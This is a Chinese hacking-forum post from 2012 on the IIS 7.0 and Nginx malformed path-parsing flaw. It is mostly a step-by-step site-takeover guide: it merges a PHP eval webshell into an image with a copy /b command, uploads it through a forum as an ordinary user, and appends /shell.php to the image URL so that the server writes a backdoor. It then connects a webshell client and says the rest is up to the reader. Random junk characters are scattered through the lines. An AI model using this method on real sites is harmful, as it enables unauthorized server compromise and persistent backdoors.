找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2179|回复: 0
打印 上一主题 下一主题

IIS7.0解析漏洞利用

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-27 19:40:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。临时解决办法:关闭cgi.fix_pathinfo为0   L# v& x, [  C; w0 c1 W' Q/ Z
Nginx好像又爆0day了,windows下可任意查看和下载脚本文件 王猛 IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。
7 s' g1 d+ J4 ]8 m__________________________________ 1 m' F& n4 X( M

- z6 o. \$ Z1 A先说一下Nginx那个0day(出来有几天了,因为介绍的网站很多,所以当时就没转载)
9 n% K, ]( r5 v先合并一张PHP一句话图片马,合并方法: / I3 s( Y+ F$ l
①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif & U8 Y9 w8 n0 ^( H' M6 g
②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为"<?fputs(fopen("shell.PHP","w"),"<?eval($_POST[akt]);?>")?>" 7 \5 z. u1 M, N' x2 k
图片随便找一张. / Q7 q5 G8 m# s
一句话:<?php fputs(fopen(shell.php,w),<?php eval($_POST[akt])?>);?> 0 @& \# V/ y# n0 V* E: t
然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。
4 g& }# ^0 D* R2 |找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。
0 ^, |7 b5 h* e. v比如假设图片地址为 http://www.political-security.com/tupian/1.jpg# ^3 P7 }  a3 d; b8 c0 E3 H. I
则执行地址为 http://www.political-security.com/tupian/1.jpg/shell.php! v9 Y5 h7 J) E2 x# u
然后,会在目录下生成shell.php。比如: www.political-security.com/tupian/shell.php
( z+ s& L3 I' zshell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。
5 V5 f6 J9 w7 L) `上面就是Nginx拿站全过程,IIS7.0的畸形解析和这个类似。
2 Y& y' J) x- F  R找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。
) k$ x* K  v7 s  i% ~7 E8 [: c$ N2 L在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。 + b* D3 M  t* K3 V: {6 `0 m8 S
剩下的就随便你去搞吧。8 q# f+ X0 ~# \! N, d! G

) ~3 s. F1 u) W# _4 S: l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表